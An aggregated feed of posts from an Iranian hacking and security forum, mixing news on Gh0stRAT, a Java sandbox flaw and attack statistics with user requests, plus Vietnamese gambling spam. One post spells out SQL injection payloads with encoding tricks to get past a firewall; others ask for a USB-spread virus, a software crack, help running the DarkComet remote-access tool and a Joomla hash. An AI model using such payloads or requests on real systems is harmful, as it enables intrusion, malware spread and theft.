Quantcast
Channel: انجمن گروه آشیانه - آموزش امنیت و راه های مقابله با هک
Viewing all 19202 articles
Browse latest View live

اسکنر sqli آنلاین

April 25, 2013, 2:09 pm
$
0
0
ببخشید که مجبور شدم تاپیک یزنم
میخواستم ببینم کسی اسکنر آنلاین برای باگ sql نداره؟
من خودم چندتا داشتم ولی الان هیچ کدوم کار نمیکنن
Search

چین مسئول 41 درصد از ترافیك حمله سراسر جهان

April 25, 2013, 2:45 pm
$
0
0
چین مسئول 41 درصد از ترافیك حمله سراسر جهان
ایالات متحده آمریكا نیز مسئولیت 10 درصد از ترافیك حمله جهان را بر عهده دارد.

یك گزارش امنیتی جدید نشان می*دهد كه چین متهم ردیف اول حملات خرابكارانه كامپیوتری بوده و ایالات متحده نیز در ردیف دوم قرار دارد.
بر اساس گزارش شركت آكامایی، چین مسئول 41% از ترافیك حملات كامپیوتری است. گزارش بلومبرگ نیز نشان می*دهد كه حملات سایبری نشأت گرفته از چین نسبت به سال گذشته بیش از سه برابر شده است. همچنین این حملات 33% نیز نسبت به سه ماهه گذشته افزایش داشته است.
مدت*ها است كه انگشت اتهام حملات سایبری به سمت چین نشانه رفته است و برخی دولت*ها نیز این كشور را متهم به حملات دولتی می*كنند. البته چین همواره این اتهام را رد كرده است.
بنا بر این گزارش، ایالات متحده آمریكا نیز در مقام دوم اصلی*ترین منابع حملات سایبری قرار گرفته است و مسئول 10% از ترافیك حمله سراسر جهان است. در سه*ماهه پیش از این، این كشور مسئول 13% از حملات سایبری جهان بود.
تركیه نیز كه معمولاً با حملات سایبری در ارتباط نیست، در این گزارش در مكان سوم قرار گرفته و منشأ 4.7% از ترافیك هك بوده است. روسیه با 4.3% در مقام چهارم و تایوان با 3.7% در مقام پنجم قرار گرفته*اند.
گزارش تحقیق در مورد نشت داده*ها در سال 2013 كه توسط شركت وریزون تهیه شده است نیز چین را مسئول حملات سایبری دانسته و انگشت اتهام را در مورد نشت داده*ها به سوی چین گرفته است. چین مسئول 30% از نشت داده*ها بوده كه 96% از آن، با جاسوسی سایبری در ارتباط است. رومانی با 28% در مقام دوم و ایالات متحده با 18% در مقام سوم قرار گرفته*اند. بلغارستان و روسیه نیز مكان*های چهارم و پنجم را به خود اختصاص داده*اند.


منبع:مرکز ماهر

حملات بدافزار Gh0stRAT هم چنان ادامه دارد

April 25, 2013, 2:47 pm
$
0
0
حملات بدافزار Gh0stRAT هم چنان ادامه دارد

هكرها برای آنكه ترافیك ارسالی عادی به نظر برسد، اطلاعات به سرقت رفته را در یك فایل JPEG قرار می دهند.


با توجه به گزارش منتشر شده توسط شركت امنیتی FireEye، ابزار جاسوسی سایبری شناخته شده با نام Gh0stRAT هم چنان در حملات بدافزاری مورد استفاده قرار می گیرد.
این شركت كه متخصص تشخیص نرم افزارهای مخرب می باشد، داده هایی را منتشر كرد كه از صدها مشتری در سال 2012 جمع آوری كرده است. 12 میلیون گزارش مختلف از فعالیت های مشكوك ثبت شده است كه حدود 2000 گزارش در دسته "تهدیدات پیشرفته پایدار" قرار می گیرند. ان تهدیدات بسیار پیچیده می باشند و به سختی شناسایی می شوند.
در بیشتر این 2000 گزارش از بدافزار Gh0stRAT استفاده شده است. این ابزار دسترسی از راه دور در كشور چین ساخته شده است و به مهاجم اجازه می دهد تا اطلاعات را از روی رایانه قربانی به سرقت ببرند. در سال 2009، محققان پروژه تحقیقاتی امنیتی Warfare Monitor و دانشگاه تورنتو عملیات جاسوسی سایبری گسترده توسط بدافزار Gh0stRAT را گزارش كردند كه بیش از 1000 رایانه را در 103 كشور مورد هدف قرار داده بود.
شركت FireEye در گزارشی آورده است كه چگونه مهاجمان، اطلاعات را از رایانه فرد قربانی استخراج می كنند و این بدافزار را بر روی رایانه های آلوده شده كنترل می نمایند. داده های جمع آوری شده در سال 2012 نشان می دهد كه مهاجمان از سرورهای دستور و كنترل برای ارائه دستورات به این بدافزار در 184 كشور استفاده می كنند و نسبت به سال 2010، 42 درصد افزایش یافته است.
گزارش منتشر شده توسط شركت FireEye نشان می دهد كه كره جنوبی مورد حمله این بدافزار قرار گرفته است. با توجه به داده های جمع آوری شده در سال 2012، كره جنوبی بیشترین حملات این بدافزار را تجربه كرده است.
هكرها برای آنكه ترافیك ارسالی عادی به نظر برسد، اطلاعات به سرقت رفته را در یك فایل JPEG قرار می دهند. این بدافزار در سایت های شبكه های اجتماعی توییتر و فیس بوك نیز مورد استفاده قرار می گیرد.
این شركت متوجه شده است كه رفتار هكرها تغییر كرده است. معمولا سرورهای دستور و كنترل در كشورهای مختلفی قرار دارند. اما در حال حاضر این سرورهای در كشور قربانیان قرار داده شده اند تا ترافیك، طبیعی به نظر برسد.


منبع:مرکز ماهر

كشف یك آسیب پذیری در آخرین نسخه Java Runtime Environment

April 25, 2013, 2:53 pm
$
0
0
كشف یك آسیب پذیری در آخرین نسخه Java Runtime Environment

مدیر عامل شركت امنیتی Security Explorations اظهار داشت كه آسیب پذیری كشف شده در مولفه Reflection API جاوا قرار دارد و می تواند برای دور زدن كامل sandbox جاوا و اجرای كد دلخواه بر روی رایانه ها مورد سوء استفاده قرار بگیرد.


متخصصان لهستانی از شركت امنیتی Security Explorations ادعا می كنند كه یك آسیب پذیری جدید را در جاوا كشف كرده اند. این آسیب پذیری آخرین نسخه سرور JRE را تحت تاثیر قرار می دهد.

Adam Gowdiak، مدیر عامل شركت امنیتی Security Explorations اظهار داشت كه این آسیب پذیری در مولفه Reflection API جاوا قرار دارد و می تواند برای دور زدن كامل sandbox جاوا و اجرای كد دلخواه بر روی رایانه ها مورد سوء استفاده قرار بگیرد. این رخنه تمامی نسخه های جاوا 7 شامل جاوا 7 به روز رسانی 21 كه توسط اوراكل منتشر شد و بسته جدید سرور JRE را تحت تاثیر قرار می دهد.

Gowdiak روز سه شنبه گفت: اگر چه شركت اوراكل آگاه است كه آسیب پذیری های جاوا می توانند روی سرور بوسیله تهیه ورودی مخرب API در مولفه های آسیب پذیر مورد سوء استفاده قرار بگیرند، اما اكثر آسیب پذیری های جاوا تنها پلاگین مرورگر جاوا را تحت تاثیر قرار می دهند.

محققان Security Explorations نتوانستند یك سوء استفاده موفقیت آمیز از آسیب پذیری جدیدی كه در Server JRE قرار دارد را نشان دهند اما آن ها فهرستی از مولفه ها و APIهای جاوا را كه می توانند برای بارگزاری یا اجرای كدهای نامعتبر جاوا بر روی سرور استفاده شوند، تهیه كرده اند.


منبع:مرکز ماهر

بازار 870 میلیون دلاری ابزارهای امنیت سایبری درسال 2017

April 25, 2013, 3:06 pm
$
0
0
بازار 870 میلیون دلاری ابزارهای امنیت سایبری درسال 2017

با همین روند ارزش بازار جهانی راهکارهای امنیت سایبری در سال ۲۰۱۷ میلادی به ۸۷۰ میلیون دلار خواهد رسید.



شرکت تحقیقاتی IDC اعلام کرد که طی سال گذشته میلادی میزان حملات سایبری به سایت*های اینترنتی مراکز مالی و همچنین دیگر سازمان*های مهم به طور قابل ملاحظه*ای افزایش یافته است.


به گزارش ایتنا، این مرکز توضیح داد که جرایم سایبری طی سال گذشته صدها هزار شبکه رایانه*ای را درگیر کرده است و در بیشتر مواقع دیده شده است که افزایش ترافیک سایت*های اینترنتی بیش از ظرفیت آنها مهم*ترین راهکار برای انجام این قبیل حملات بوده است.

مرکز تحقیقاتی IDC همچنین اضافه کرد که این قبیل اتفاقات باعث افزایش استفاده از ابزارهای امنیتی در جهان شده است.

این شرکت تحقیقاتی پیش*بینی کرده است که با همین روند ارزش بازار جهانی راهکارهای امنیت سایبری در سال ۲۰۱۷ میلادی به ۸۷۰ میلیون دلار خواهد رسید.

"کریستین کریستینسن"(Christian Christiansen) از کارشناسان مرکز IDC گفت: «بازار جهانی راهکارهای مقابله با بدافزارهای DDoS بین سال*های ۲۰۱۲ تا ۲۰۱۷ میلادی رشد سالانه ۱۸.۲ درصدی خواهد داشت تا در آن زمان ارزش این بازار به ۸۷۰ میلیون دلار برسد.»


منبع:ايتنا

bypass xpath

April 25, 2013, 3:30 pm
$
0
0
با سلام

من وقتی می خوام xpath بزنم به مشکل Forbidden میخورم با ادرس زیر
کد:
id=1%20and%20extractvalue(rand(),(select+table_name+from+/**/information_schema.tables/**/+where+table_schema=database()+limit+0,1))--
مشکل فهمیدم از information_schema.tables قسمت است

را حل hex و را حل char رو هم رفتم ولی بعدش این دو خطا رو دارم

hex :

کد:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''696e666f726d6174696f6e5f736368656d612e7461626c6573' where table_schema=database' at line 1
خطا:

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''696e666f726d6174696f6e5f736368656d612e7461626c65 73' where table_schema=database' at line 1


char:

کد:
id=1%20and%20extractvalue(rand(),(select+table_name+from+/**/char(105,110,102,111,114,109,97,116,105,111,110,95,115,99,104,101,109,97,46,116,97,98,108,101,115)/**/+where+table_schema=database()+limit+0,1))--
خطا:

کد:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'from /**/char(105,110,102,111,114,109,97,116,105,111,110,95,115,99,104,101,109,9' at line 1

راحل دوستان؟؟؟

سرور مجازی برای 5 نفر رایگان

April 25, 2013, 5:03 pm
$
0
0
سلام

در این تاپیک برای 5 نفر سرور مجازی هدیه میشه
یعنی برای پست اول تا پنجم

توضیحات:

سرورهای کرکی
با مدیریت ادمین
برزیل
رم 1 تا 4 گیگ

:93::43:

این چه هشیه

April 25, 2013, 5:11 pm
$
0
0
46fe93c463c0f49368be35b50c9ac047:$1$2fb3c824$



از جوملاست
Search

▄▀▄Hướng Dẫn Cá Độ Đá Banh Trên Mạng, Hướng Dẫn Cá Độ Online Rút Tiền 2-5h

April 25, 2013, 7:31 pm
$
0
0
www.cado-vn1.com | http://cadoonline.mov.mn
Cá độ online | Cá độ trên mạng M88 | Cá độ đá banh | Cá độ bóng đá | Cá độ trực tuyến | Cá độ qua mạng m88
HƯỚNG DẪN TẠO TÀI KHOẢN CÁ ĐỘ BÓNG ĐÁ TRÊN MẠNG Có Hình Ảnh Chi Tiết,

click vào đây vì bài dài post lên không được:
Hướng Dẫn Chơi Cá Độ Bóng Đá Tại Nhà Cái M88

Hướng Dẫn Chơi Cá Độ Đá Banh Tại Nhà Cái 188Bet

Hướng Dẫn Chơi Number Game Tại 12Bet
Xem Bóng Đá Online
Đặc Biết Mansion88 Quy Định 1 usd=20 Nghìn vnđ Và Chỉ 100 Nghìn Là Được Nạp Tiền Vào Tài Khoản Ngay
Gửi tiền (5-10 phút trong ngày) Hổ trợ các ngân hàng tại việt nam như: VietComBank, DongA Bank, TechComBank, ACB
Rút tiền (2-8 giờ trong ngày) Hổ trợ tất cả các ngân hàng tại việt nam kể cả thứ 7 và chủ nhật
Có Đủ Các Trò chơi như: tất cả các môn thể thao, casino, poker, đánh bài trược với các hotgirl đẹp...

Hướng Dẫn Cá Độ Online > Nếu bạn ở VN thì hãy đăng ký theo link đại lý dưới đây để việc gửi tiền và rút tiền nhanh nhất cho bạn. Xin cảm ơn.

Link Vào 100% M88, 188bet, 12bet Cập Nhập Hàng Ngày

Click Vào Đây Để Chuyển Tơi Trang Đăng Ký

Nếu Không Vào Được Link Trên Thì Thử Lại Với Các Link Dưới Đây:
www.ms882.com( link phụ )
Link 2|Link 3|Link 4|Link 5|Link 6

Click vào nút "ĐĂNG KÝ"

Để qua bước tiếp theo.Tại bước này Điền thông tin cẩn thận và chính xác ( Điền thông tin trùng với thẻ ATM của bạn, như họ

tên, ngày tháng năm sinh,email và số điện thoại ), để gửi tiền, rút tiền cho nhanh.Lưu ý: BẠN PHẢI CHÚ Ý SỐ ID ĐẠI LÝ Ở

Việt Nam luôn là: 22467 nếu ko sau này sẽ khó khăn trong việc rút tiền
http://2.bp.blogspot.com/-VmazUuzsNB...xY/s1640/1.png

Đến đây coi như bạn đã hoàn thành việc đăng ký.

Sau đây là 2 cạch nạp tiền vào M88

BƯỚC TIẾP THEO: GỬI TIỀN VÀO M88 (5-10 phut)


Tags:www.cado-vn1.com

نياز به سرور ميكروتيك

April 25, 2013, 8:05 pm
$
0
0
نياز به سرور ميكروتيك

ی ویروس برای فلش میخوام

May 2, 2013, 11:47 pm
$
0
0
سلام دوستان ی ویروس میخوام :
هرکس فلش من رو باز کرد ی اتفاقی برای کامپیوترش بیوفته یا یک کرم ریزی کنه
دوستان ممنون اگه کارم رو راه بندازید

فروشگاه کتاب

May 3, 2013, 12:02 am
$
0
0
سلام

خسته نیاشید

لطفلا کمکم کنید

نوشتن سایت فروشگاه کتاب با کدهای asp.net با زبان #C بانک اطلاعاتی SQL Server 2008

سایت شامل( عضویت در سایت .خرید فروش.ویراش.حذف )

مرسی ممنون

آفرین به این پروژ خیلی نیاز دارم

مسیر Document چگونه بدیت بیاوریم ؟!

May 3, 2013, 12:03 am
$
0
0
سلام
من چه جوری میتونم برای برنامم توی VB.NET مسیر Document رو تعریف کنم ؟!
مثلا مسیر داک کاربر .
کد:
C:\Users\Name\My Documents
اما درست نیست ...
اگه میشه شما کمک کنید ...

رابطه فیثاغورس در vb6

May 3, 2013, 12:20 am
$
0
0
بچه ها یک سوال خیلی ضروری دارم لطفا کمکم کنید

من یک سورسی در اینترنت برای قضیه فیثاغورس پیدا کردم

FOR A=1 TO 500

FOR B=1 TO 500

FOR C=1 TO 500

IF (A*A=B*B+C*C)OR(B*B=A*A+C*C)OR(C*C=A*A+B*B) THEN

PRINT "A=";A,"B=";B,"C=";C

END IF

NEXT C

NEXT B

NEXT A

حالا نمیدونم باید چ کار کنم اما به نظرم کامل نیست اما یک برنامه ی دیگه دیدم که به صورت صحیح جوابش رو میده اما سورسش رو ندارم اگه کسی میتونه بنویسه یا داره لطفا بهم بده فیلم رو هم گذاشتم

[URL="http://s4.picofile.com/file/7748671933/Fisaghores.exe.html"]http://s4.picofile.com/file/7748671933/Fisaghores.exe.html[/URL

و اینم خود برنامه :

http://s4.picofile.com/file/77486730..._com_.zip.html

ممنون البته خود سورس در وبلاگ هست اما 20 هزار تومان میفروشد و لینکش دارای رمز میباشد

با تشکر

موفق باشید

کرک نرم افزار

May 3, 2013, 12:24 am
$
0
0
سلام دوستان
من به یه نرم افزار خیلی احتیاج دارم اما باید حتما لاینسیسش رو خرید.اگه میتونه یه نفر برام کرکش کنه

اسم نرم افزار:erankbooster
سایت سازنده:www.erankbooster.ir
ورژن نرم افزار:10.9



دوستان کل سایتای خرجی هم گشتم اما کرکش نیست لطفا کمکم کنید
Search

درخواست برنامه و الگوریتم کوتاهترین مسیر؟؟

May 3, 2013, 1:04 am
$
0
0
با سلام خدمت دوستان عزیز
یه برنامه میخواستم که بتونه کوتاه ترین مسیر رو پیدا کنه در واقع درونش از الگوریتم کوتاهترین مسیر استفاده شده باشه ممنونم برام بذارید .

dfd کی داره؟ مهندسی نرم افزار

May 3, 2013, 1:42 am
$
0
0
سلام دوستان واسه درس مهندسی نرم افزار dfd می خوام ، استاد ما هم خیلی زرنگه و اگه از سایت های اینترنتی دانلود کرده باشیم داره و میفهمه
اگه دوست عزیزی بتونه یک dfd بفرسته خیلی ممنونم میشم .
یا علی

برنامه کاوشگر

May 3, 2013, 2:13 am
$
0
0
با سلام
از اساتید گرامی کمک می خواهم در مورد برنامه ای که می خوام بنویسم این برنامه ار یک سایت اطلاعاتی را که در یک جای معینی است استخراج می کند
ممنون از کسانی که من را راهنمایی می کنند

اموزش فایروال bitdefender

May 3, 2013, 2:31 am
$
0
0
سلام من برای استفاده از darkcoment مجبورم انتی ویروسم رو خاموش کنم یا اجازه دست رسی رو بدم

کسی هست اموزشی در مورد انتی ویروس bitdefender total security داشته باشه؟:(:15:

سوتی مدیر اشیانه

May 3, 2013, 3:01 am
$
0
0
سلام دوستان اون قسمت بالا رو در انجمن ببینید
نوشته اولین انجمن امنیت شبکه در ایران
بعد اونور یه چیز دیگه نوشته
the first security forum in iran
در ضمن تا چند وقت پیش به فارسی نوشته بود اولین انجمن هک و امنیت در ایران اگه دقت کرده باشین
لطفا اطلاع رسانی کنین
:84:
Viewing all 19202 articles
Browse latest View live
Search
<script src="https://jsc.adskeeper.com/r/s/rssing.com.1596347.js" async> </script>